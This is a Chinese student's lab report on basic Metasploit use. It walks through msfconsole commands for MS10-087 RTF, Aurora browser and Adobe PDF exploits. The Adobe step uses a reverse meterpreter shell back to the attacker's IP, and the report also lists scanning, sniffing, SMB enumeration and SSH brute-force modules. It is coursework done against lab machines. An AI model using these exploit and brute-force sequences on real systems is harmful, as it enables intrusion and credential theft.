20155202张旭 Exp5 MSF基础应用

20155202张旭 Exp5 MSF基础应用

实践内容

本次实验我使用的攻击方式:

1.针对office软件的主动攻击:——MS10-087:

2.MS10-002漏洞对浏览器攻击

3.针对客户端的攻击:Adobe Reader软件的渗透攻击——adobe_toolbutton

4.APR中间人窃听被动攻击的模块攻击: spoof/arp/arp_poisoning

6. ARP扫描

7.SNMP监听: snmp_enum

- 基础问题回答

用自己的话解释什么是exploit,payload,encode.

exploit 漏洞利用

payload 攻击载荷,是我们exploit中shellcode中的主要功能代码。

encode 编码,是我们用来修改字符,达到免杀效果。

首先我们应该知道MSF常用漏洞命令:

show exploits
列出metasploit框架中的所有渗透攻击模块。
show payloads
列出metasploit框架中的所有攻击载荷。
show auxiliary
列出metasploit框架中的所有辅助攻击载荷。
search name
查找metasploit框架中所有的渗透攻击和其他模块。
info
展示出制定渗透攻击或模块的相关信息。
use name
装载一个渗透攻击或模块。
LHOST
你本地可以让目标主机连接的IP地址,通常当目标主机不在同一个局域网内时,就需要是一个公共IP地址,特


别为反弹式shell使用。
RHOST
远程主机或是目标主机。
set function
设置特定的配置参数(EG:设置本地或远程主机参数)。
setg function
以全局方式设置特定的配置参数(EG:设置本地或远程主机参数)。
show options
列出某个渗透攻击或模块中所有的配置参数。
show targets
列出渗透攻击所有支持的目标平台。
set target num
指定你所知道的目标的操作系统以及补丁版本类型。
exploit:运行模块

开始试验:

1.针对office软件的主动攻击:——MS10-087:

在攻击机输入以下指令:
msf > use exploit/windows/fileformat/ms10_087_rtf_pfragments_bof
msf exploit(windows/fileformat/ms10_087_rtf_pfragments_bof) > set payload windows/exec //运行一个可执行文件
msf exploit(windows/fileformat/ms10_087_rtf_pfragments_bof) > set CMD calc.exe //绑定计算机程序,进行启动
msf exploit(windows/fileformat/ms10_087_rtf_pfragments_bof) > exploit //攻击
  • 使用show options命令查看一些参数值,比如文件名、绑定程序等

  • 我用了 cp -r 要复制的文件夹绝对地址 /root 命令,将那个文件夹复制到主机root目录下。

  • 取出来了这个文件,复制到靶机下,双击打开,结果打开了计算器,正确,攻击完成。

2.MS10-002漏洞对浏览器攻击

  • 该模块针对浏览器包括IE6、IE7、IE8,在kali输入msfconsole进入msf终端
use windows/browser/ms10_002_aurora
set SRVHOST 192.168.43.80
set LHOST 192.168.43.80
set URIPATH aurora.html
set LPORT 5202
  • 靶机输入地址:http://192.168.43.80:8080/aurora.html

  • 遇到了问题; 打不开网页:

  • 排查发现没有ping通;

  • 改桥接ping通后发现:Internet Explorer 遇到问题需要关闭。我们对此引起的不便表示抱歉。

  • 上网查询后,决定关掉EXplorer程序:到任务管理器关闭explore进程:
    -

  • 然后发现IE浏览器没了,真是愚蠢,然后在计算机程序功能里恢复一下吧:

  • 还是在IE里的inteenet选项里把能启用的都启用,把级别调到最低,总之把IE弄到危险最大化来尝试一下:

  • 添加到可信站点里:

  • 最后尝试一下:


  • 依旧报错,最后我在网上找了 一个方法:

1. 把下面这行字符复制到cmd框里面去回车等待dll文件全部注册完成就关闭可以了(下面是要运行的代码): 
 for %1 in (%windir%\system32\*.dll) do regsvr32.exe /s %1 
完成后重新启动电脑
2. 打开浏览器,点“工具”→“管理加载项”那里禁用所有可疑插件,或者你能准确知道没问题的保留。
3,然后→工具→INTERNET选项→常规页面→删除cookies→删除文件→钩选删除所有脱机内容→确定→设置使用的磁盘空间为:8MB或以下(我自己使用1MB)→确定→清除历史纪录→网页保存在历史记录中的天数:3以下→应用确定(我自己使用的设置是0天)。 
4. 还原浏览器高级设置默认值:工具→INTERNET选项→高级→还原默认设置。 
5. 恢复默认浏览器的方法“工具”→Internet选项→程序→最下面有个“检查Internet Explorer是否为默认的浏览器”把前面的钩选上,确定。 
6. 设置主页:“工具”→Internet选项→常规→可以更改主页地址→键入你喜欢的常用网址→应用。 
  • 好了,变成这样了:
  • 遇到 出现为了帮助您保护计算机,windows已经关闭此程序这样的问题解决方法如下:
  1. 关闭数据保护,编辑Boot.ini文件,将/NoExecute=OptIn 改为/NoExecute=AlwaysOff。
  2. 要编辑Boot.ini,请在开始中我的电脑上点右键—属性—高级,启动和故障恢复设置,完成
  • 在kail里链接成功:

  • 真心不容易啊,我开了5个虚拟机来做,最后筛选出了一个可以成功的虚拟机:

  • 查ip发现是这个虚拟机:

完成攻击!

3.针对客户端的攻击:Adobe Reader软件的渗透攻击——adobe_toolbutton

  • 在攻击机kali输入以下指令:
msf > use windows/fileformat/adobe_cooltype_sing
msf exploit(adobe_cooltype_sing) > set payload windows/meterpreter/reverse_tcp //tcp反向回连
msf exploit(adobe_cooltype_sing) > set LHOST 192.168.43.80//攻击机ip
msf exploit(adobe_cooltype_sing) > set LPORT 5202 //攻击端口
msf exploit(adobe_cooltype_sing) > set FILENAME 20155202.pdf //设置生成pdf文件的名字
msf exploit(adobe_cooltype_sing) > exploit //攻击

  • 将生成的pdf文件拷贝到靶机上,输入back退出当前模块,进入监听模块,输入以下命令:
msf > use exploit/multi/handler //进入监听模块
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp //tcp反向连接
msf exploit(handler) > set LHOST 192.168.43.80 //攻击机ip
msf exploit(handler) > set LPORT 5202 //攻击端口固定
msf exploit(handler) > exploit
  • 在靶机上打开生成的pdf:
  • kail上显示回连成功,可以进行操作了:
  • 当靶机关闭pdf文件,则此次监听关闭。

adobe_toolbutton攻击成功!

4.辅助模块:

1,.首先用 : show auxiliary 列出metasploit框架中的所有辅助攻击载荷:

找一个别人都没用过的作为我的攻击手段。是真的难找啊,找一个满足虚拟机配置还要和其他同学与众不同的,首先我找到了1999年的APR中间人窃听被动攻击的模块:spoof/arp/arp_poisoning

  • 这是 Wget FTP软链接攻击漏洞,2014年阿里巴巴安全部专门为其进行了安全分析:
  • 无奈我没有linux靶机,只好换一个我靶机可以用的arp扫描

6.ARP扫描

msf > use auxiliary/scanner/discovery/arp_sweep 
然后
set RHOSTS 192.168.108.0-192.168.108.255
然后 exploit进行攻击
  • 可以发现NTP网络时间协议服务器,它是用来同步各个计算机的时间的协议用的。

7.snmp扫描与枚举:

简单网络管理协议(SNMP),由一组网络管理的标准组成,包含一个应用层协议(application layer protocol)、数据库模型(database schema)和一组资源对象。该协议能够支持网络管理系统,用以监测连接到网络上的设备是否有任何引起管理上关注的情况
  • 使用SNMP扫描模块可以收集大量信息(如开放端口,服务,主机名,进程和正常运行时间等)。使用我们的Metasploitable虚拟机作为我们的目标,运行辅助/ scanner / snmp / snmp_enum模块
  • 首先查看一下其基本信息:info scanner/snmp/snmp_enum
开始试验:
  • 需要的模块:
use auxiliary/scanner/snmp/snmp_login
use auxiliary/scanner/snmp/snmp_enum
use auxiliary/scanner/snmp/snmp_enumusers (windows)
use auxiliary/scanner/snmp/snmp_enumshares (windows)
  • 首先加载模块:
msf > use auxiliary/scanner/snmp/snmp_login 
msf auxiliary(snmp_login) > show options
  • 可以看到161端口正是udp端口。
  • 设置监听ip:msf auxiliary(snmp_login) > set RHOSTS 192.168.244.130
  • 这里要说明我是为了节省时间,其实还可以这样;监听整个网段所有主机
  • 这是我修改网段后得到的结果:
msf auxiliary(snmp_login) > set THREADS 10   //设置线程
msf auxiliary(snmp_login) > run 开始跑
  • 转到我们的另一个模块:snmp_enum
msf auxiliary(snmp_enum) > set RHOSTS 192.168.244.130
msf auxiliary(snmp_enum) > set THREADS 10
msf auxiliary(snmp_enum) > show options 

  • 然后开始跑:msf auxiliary(snmp_login) > run

  • 出错了: Errno::ECONNREFUSED Connection refused - recvfrom(2),这是怎么回事呢?
    Connection refused错误返回,错误码是ECONNREFUSED。从这个错误码知道远端没有这个服务端口,但是161就是UDP端口啊

  • 是不是我的主机有问题?不,在控制面板—程序—打开或关闭windows功能—找到snmp和Internet信息服务,展开---选中FTP的三个项。如果FTP也开启了,那就把端口号改成22。

  • 成功了,现在是连接超时问题:

  • 我换了一台xp靶机尝试:

  • 更改地址:192.168.244.129

  • 哇,新问题了诶SNMP request timeout.

  • 按照这个进行修改:

此外:

MSF信息收集还有其他的途径:

nmap扫描

db_nmap -sV 192.168.1.1

auxiliary扫描模块

RHOSTS <>RHOST 
192.168.1.1-24 192.168.1.1/24 
files:/root/ip.txt

port扫描

use auxiliary/scanner/portscan/syn
set INTERFACE̵ PORTS̵ RHOSTS̵ THREADSҔ run

nmap ipid idle扫描

use auxiliary/scanner/ip/ipidseq
set RHOSTS 192.168.1.0/24 Ҕ run
nmap -PN -sI <dile地址> <扫描地址>

UDP扫描

use auxiliary/scanner/discovery/udp_sweep
use auxiliary/scanner/discovery/udp_probe

密码嗅探

use auxiliary/sniffer/psnuffle

SMB扫描

SMB版本扫描

use auxiliary/scanner/smb/smb_version 扫描命名管道,判断SMB服务类型(账号、密码)

use auxiliary/scanner/smb/pipe_auditor 扫描通过SMB管道可以访问的RCERPC服务

use auxiliary/scanner/smb/pipe_dcerpc_auditor SMB共享枚举(账号、密码)

use auxiliary/scanner/smb/smb_enumshares SMB用户枚举(账号、密码)

use auxiliary/scanner/smb/smb_enumusers SID枚举(账号、密码)

use auxiliary/scanner/smb/smb_lookupsid

SSH扫描

SSH版本扫描

use auxiliary/scanner/ssh/ssh_version

SMB密码爆破

use auxiliary/scanner/ssh/ssh_login
    set USERPASS_FILE /usr/share/metasploit-framework/data/wordlists/
    root_userpass.txt ; set VERBOSE false ; run

SSH公钥登录

use auxiliary/scanner/ssh/ssh_login_pubkey
set KEY_FILE id_rsa;set USERNAME root ;run

实验体会:这次实验让我体会了许多新的漏洞攻击,使我对msf工具的熟练程度有很大提升,同时我对例如SNMP之类的UDP协议有了新的认识,动手能力得到发展。

posted @ 2018-04-20 23:11  20155202张旭  阅读(335)  评论(0编辑  收藏  举报